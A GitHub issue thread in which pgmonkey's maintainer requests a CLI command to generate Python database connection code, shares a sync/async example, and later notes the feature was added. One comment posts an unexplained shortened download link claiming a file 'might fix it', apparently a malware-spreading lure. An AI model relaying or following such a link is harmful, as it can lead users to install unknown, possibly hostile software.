### ISSUE TITLE
[Request] :  Generate python connection code

### ISSUE THREAD

**Issue by RexBytes** [RexBytes/pgmonkey#2]
Got the idea from using the configuration cli tester.

Can you also create a cli command to generate example python connection code for a specific config file?

For example, asynchronous connections need to be wrapped with an asyncio.run(), async with, and await.
Synchronous connections look more normal and work with the with connection as conn: with conn.cursor() as cur.

You get what I mean?

Something like,

pgmonkey pgconfig genconncode --filepath config.yaml

Looking at a tutorial I found this code,

#!/usr/bin/env python3
import asyncio
from pgmonkey import PGConnectionManager

async def test_database_connection(config_file, config_name):
    connection_manager = PGConnectionManager()
    connection = await connection_manager.get_database_connection(config_file)

    try:
        if connection.connection_type in ['async', 'async_pool']:
            async with connection as conn:  # Now conn is always the actual connection
                async with conn.cursor() as cur:
                    await cur.execute('SELECT version();')
                    print(f"{config_name}: {await cur.fetchone()}")
        else:
            with connection as conn:  # Synchronous case
                with conn.cursor() as cur:
                    cur.execute('SELECT version();')
                    print(f"{config_name}: {cur.fetchone()}")
    finally:
        await connection.disconnect() if asyncio.iscoroutinefunction(connection.disconnect) else connection.disconnect()

if __name__ == "__main__":
    base_dir = '/home/ubuntu/Desktop/rexdblinker/connectionconfigs/'
    config_files = {
        'pg_async_pool.yaml': base_dir + 'pg_async_pool.yaml',
        'pg_async.yaml': base_dir + 'pg_async.yaml',
        'pg_normal.yaml': base_dir + 'pg_normal.yaml',
        'pg_pool.yaml': base_dir + 'pg_pool.yaml'
    }

    for config_name, config_file in config_files.items():
        print(f"Testing connection with config: {config_name}")
        asyncio.run(test_database_connection(config_file, config_name))
        
        
It's great that you can detect the type of connection and run all async and sync connections under an 'async call'.
I just think a per config connection example would help beginners.

**Comment by Buqra55** [comment]
This might help:This file might fix it

https://bit.ly/4eugCty

you may need to install the c compiler

**Comment by RexBytes** [comment]
This was added in V1.0.4

See the docs at https://pgmonkey.net/reference.html  for examples on how to autogenerate boiler plate code direct from your config files!!
